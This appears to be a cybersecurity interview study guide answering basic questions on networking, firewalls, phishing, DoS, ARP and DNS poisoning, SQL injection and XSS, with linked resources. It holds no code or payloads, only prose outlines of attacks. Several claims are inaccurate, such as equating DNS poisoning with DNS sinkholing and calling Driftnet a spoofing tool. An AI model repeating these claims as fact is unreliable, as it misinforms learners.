1- What is CIA triangle?

There are three core components of the CIA triad:

a. Confidentiality ensures data is properly handled, protected, and accessed by authorized

users only.

b. Integrity confirms data is accurate and not altered by unauthorized people throughout its
lifecycle.

c. Availability ensures authorized users can access data whenever needed. This is done
through properly maintaining and configuring technical infrastructure and systems that hold and
display the information.

There should be a balance among these three. For example, higher confidentiality may require
more computing power for decryption, causing lower availability. Therefore, a balance among
these three are important.

***********************************************************************************************************

2- Where can you find event logs in a Windows system?

-In Event Viewer.

3- Where can you find logs in a Linux system?

-Stored in plain text and can be found in /var/log directory.

4- What is a three-way handshake?

- A three-way handshake is a method used in a TCP/IP network to create a reliable connection

between a client and a server.

- A three-way handshake is also known as a TCP handshake or SYN-SYN-ACK and requires

both the client and server to exchange SYN (synchronization) and ACK (acknowledgment)
packets before actual data communication begin.

Keywords: SYN packets, TCP handshake, local host, server.

Video resource:

***********************************************************************************************************

6. What is a firewall?

A. It is a first line of defense in network security. It helps to monitor incoming and outgoing
network
traffic. Using an access control list (ACL), we can decide whether to allow or block specific traffic
based on a defined set of security rules (destination port, IP, protocol).

B. A firewall can be hardware, software, or both.

C. Types of Firewalls:
a. Host-based
b. Network-based
c. Next-Generation Firewall

Keywords: incoming/outgoing traffic, ACL, rules, allow, deny

Video resource: What is a Firewall?
More resources: What Is a Firewall? - Cisco
5. Can you please tell me what happens when you type google.com and hit enter?

A. The browser will use DNS lookup to find the IP address of google.com in the following way:

i. First, the browser checks its cache for DNS records of previously visited websites to find
the related IP. If it isn't found, the next step will take place.

ii. Second, the browser checks the OS cache since the OS also maintains a cache of DNS
records. If it isn't found, the next step will take place.

iii. Third, the browser checks the router cache as it also maintains its own cache of DNS
records. If it isn't found, the next step will take place.

iv. Fourth, the browser checks the ISP cache as ISP maintains its own DNS server. If it isn't
found, the next step will take place.

v. Fifth, ISP’s DNS server initiates a DNS query to find the server’s IP address that hosts
Google.com.

vi.Sixth, If the ISP does not know then it asks the root name server. The root name server
will redirect it to the .com domain name server. .com name server will redirect it to the
google.com name server. The google.com name server will find the matching IP address
for google.com in its DNS records and return it to your ISP’s DNS server, which will send
it back to your browser.

Keywords: DNS, DNS record, query, resolve, cache, TLD

More resources: What happens when you type a URL in the browser and press enter?
7. What is a proxy or a reverse proxy?

A. A (forward) proxy server is a system that provides a gateway between users and the
internet. It is a server, “intermediary” because it goes between end-users and the web pages
they visit Online.

B. A (forward) proxy is located at the edge of the network bordering the internet and
internal network. There are three main use of the forward proxy:
a. It improves performance by caching content, which improves the speed and saves the
Bandwidth.
b. It allows multiple clients to route traffic to an external network. For instance, a
business
may have a proxy that routes and filters employee traffic to the public Internet.
c. It can be configured to block certain URLs, whitelist or blacklist certain protocols.

C. A reverse proxy is a system that sits in front of web servers and forwards client
requests to those web servers.

Keywords: bandwidth, URL filtering, block, hide/camouflage IP

Video resource: What is a Proxy Server?
More resources: What is a reverse proxy? | Proxy servers explained | Cloudflare
8- What is an IPS / IDS?

************************************************************************************************************

10. What is social engineering?

A. Social engineering is a manipulation technique that is used to exploit human error. It is mostly
done to gain private information, access, or valuables.

B. Social engineering attacks are built around how people think and act. To do that, an attacker
may do some research about the person, once an attacker understands what motivates a user’s
actions, they can deceive and manipulate the user effectively.

C. Some types of social engineering: Phishing, Whaling, Diversion Theft, Baiting, Honey Trap,
Pretexting, SMS Phishing, Scareware.

Keywords: manipulation, exploit, human error,

Real-life example: The Beirut Bank Job – Darknet Diaries
More Information: 10 Types of Social Engineering Attacks | CrowdStrike
9. What is phishing? How to prevent phishing attacks?

A. Phishing attacks send fraudulent communications that appear to come from a reliable source.

B. It is usually done through email and targets a person's vulnerabilities.

C. It usually aims to get a person to click a malicious link in the email, download an attachment
with malicious intent, or simply ask to perform a certain type of task.

D. The intentions of phishing attacks may be trying to get personal or sensitive information,
download and execute a malicious program on the computer, or persuade a person to perform
some tasks such as making a monetary transaction.

E. In addition to email security solutions, phishing awareness and staff education are among the
most important practices to protect an organization from phishing attacks.
11. What is the Cyber Kill Chain?

A. The Cyber Kill Chain Framework, by Lockheed Martin, explains the typical procedure that
hackers take when performing a successful cyber attack.

B. It also helps to identify vulnerabilities, and helps security teams to stop the attacks at every
stage of the chain.

Keywords: Lockheed Martin, stages of attack

More resources: Cyber Kill Chain® | Lockheed Martin
12. What is the MITRE ATT&CK framework?

A. Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) developed by MITRE

corporation in 2013.

B. This framework is a guideline for classifying and describing cyberattacks and intrusions. It
provides a structured method to help to understand and stop attacks.

C. The framework consists of 14 tactics categories, which are then broken down further into
specific techniques and sub-techniques.

Keywords: tactics, techniques, procedures

More resources: MITRE ATT&CK®
ATT&CK - Wikipedia

**********************************************************************************************************

13. What is a DoS/DDoS attack?

A. A denial of service (DoS) or distributed denial of service (DDoS)attack is a malicious attempt

from one or more computers against a single target. The attack aims to overload system
resources and prevents legitimate users from accessing the services on the target computers.

B. While a DoS attack is launched from one point, a DDoS attack comes from numerous
compromised devices (botnets), often distributed globally.

C. TCP Handshake and SYN flood attacks are common DoS/DDoS attacks.
TCP sessions use a three-way handshake when establishing a session between two systems.
These two systems start a session by exchanging three packets (1 SYN - 2 SYN/ACK - 3 ACK).
After a successful handshake, the session will be established, and the data exchange starts.
In TCP Handshake and SYN flood attacks, attackers never send the last ACK packet, leaving
the session half open. These half-open sessions consume the server’s resources while waiting
for the third packet and may cause the server to crash.

Keywords: syn flood, TCP handshake, resource exhaustion, SYN/ACK packet

More resources: The 3 Types of DDoS Attacks Explained | AT&T Cybersecurity
DDoS Attack Explained

Real-life example: Microsoft Mitigated Record-Breaking 3.47 Tbps DDoS Attack on Azure
Customers
14. What is ARP poisoning?

A. ARP(Address Resolution Protocol) poisoning is a type of man-in-the-middle attack that can

be used to stop network traffic, change it, or intercept it. The sequence of ARP poisoning
attacks is below:

● The attacker must have access to the network. They scan the network to determine the
IP addresses of at least two devices—let’s say these are a workstation and a router.

● The attacker uses a spoofing tool, such as Arpspoof or Driftnet to send out forged ARP
responses.

● The forged responses advertise that the correct MAC address for both IP addresses
belonging to the router and workstation is the attacker’s MAC address. This fools both
the router and workstation into connecting to the attacker’s machine instead of to each
other.

● The two devices update their ARP cache entries and, from that point onwards,
communicate with the attacker instead of directly with each other. The attacker is now
secretly in the middle of all communications.

Due to clear text transmission, ARP Poisoning is effective in HTTP, FTP, TelNet, etc.
Keywords:
Video resource: ARP Poisoning | Man-in-the-Middle Attack
15. What is DNS poisoning?

DNS (Domain Name System) poisoning attacks modify or corrupt DNS data. Attackers attempt
to modify/replace the IP address in the DNS record with a malicious website’s IP address. If
successful, users will be sent to malicious websites instead of those they intend to visit.
DNS poisoning (aka DNS Sinkhole) is also used by SOC to protect the organization.

Keywords:
More resources: What is DNS Spoofing and Cache Poisoning?

************************************************************************************************************

17. What is OWASP Top 10?

A. The Open Web Application Security Project (OWASP) is a nonprofit organization focused on
improving software security.

B. OWASP Top-10 lists the ten most common web application security risks.

C. It is a great, free foundational resource for developers when writing code, performing tests
with
these Top 10 risks in mind, and building secure applications/programs.

1. Broken Access Control

2. Cryptographic Failures
3. Injection
4. Insecure Design
5. Security Misconfiguration
6. Vulnerable and Outdated Components
7. Identification and Authentication Failures
8. Software and Data Integrity Failures
9. Security Logging and Monitoring Failures
10. Server-Side Request Forgery

Keywords:
More resources: OWASP Top Ten
16- What is DNS Sinkhole?

DNS Sinkholing is a mechanism aimed at protecting users by intercepting DNS request

attempting to connect to known malicious or unwanted domains and returning a false, or rather
controlled IP address. The controlled IP address points to a sinkhole server defined by the DNS
sinkhole administrator.

This technique can be used to prevent hosts from connecting to or communicating with known
malicious destinations such as a botnet C&C server.

*****************************************************************************************************

18. What is SQL injection?

A. Databases using Structure Query Language (SQL) can be vulnerable to SQL injection attack.
An attacker can cause an SQL database to perform actions that the developer did not intend
like revealing, modifying, or deleting sensitive data.

B. In an SQL attack, an attacker uses malicious SQL code/script/sql query generally in the login
page, forms.) In the query, the TRUE statement must work all the time. Such as 1=1, like in the
ROCKYOU hacking incident.

C. SQL injection is in the list of OWASP Top 10 application security risks.

D. Input validation is a main way of protection from SQL injection attacks.

Keywords: inject a script, input validation,

More resources: What is SQL Injection and How to Prevent It?
Real-life example: RockYou – Darknet Diaries
19. What is Cross-Site Scripting(XSS)? Reflected XSS? Stored XSS?

A. Cross-Site Scripting(XSS) is a web application vulnerability that allows attackers to inject

scripts into web pages.

B. There are two ways of XSS:

a. Reflected XSS or non-persistent attacks are delivered to victims through emails,
websites, social media platforms, etc. When a user is tricked into clicking on a malicious
link, submitting a specially crafted form, or even just browsing to a malicious site, the
injected code travels to the vulnerable website, which reflects the attack back to the
user’s browser. The browser then executes the code because it came from a “trusted”
Server.
b. Stored or persistent XSS- Stored attacks are those where the injected script is
permanently stored on the target servers, such as in a database, in a message forum,
visitor log, comment field, etc. The victim then retrieves the malicious script from the
server when it requests the stored information.

C. Input validation is a main way of protection from XSS attacks.

Keywords: inject script, input validation.

More resources: Cross Site Scripting (XSS) | OWASP Foundation

*********************************************************************************************************

20. What is a vulnerability scan?

A. Vulnerability scanning is the process of identifying security weaknesses and

vulnerabilities in systems and software running on them.

B. Vulnerability scanners is a program that performs a scan to identify those weaknesses.

C. Usually, performing these vulnerability scans is a common requirement for regulatory

compliance (ex. NIST, Section 4.3) and can help to minimize an organization's cybersecurity
risk.

More resources: Technical guide to information security testing and assessment

Video resource: MicroNugget: How to Do Penetration Testing and Vulnerability Scanning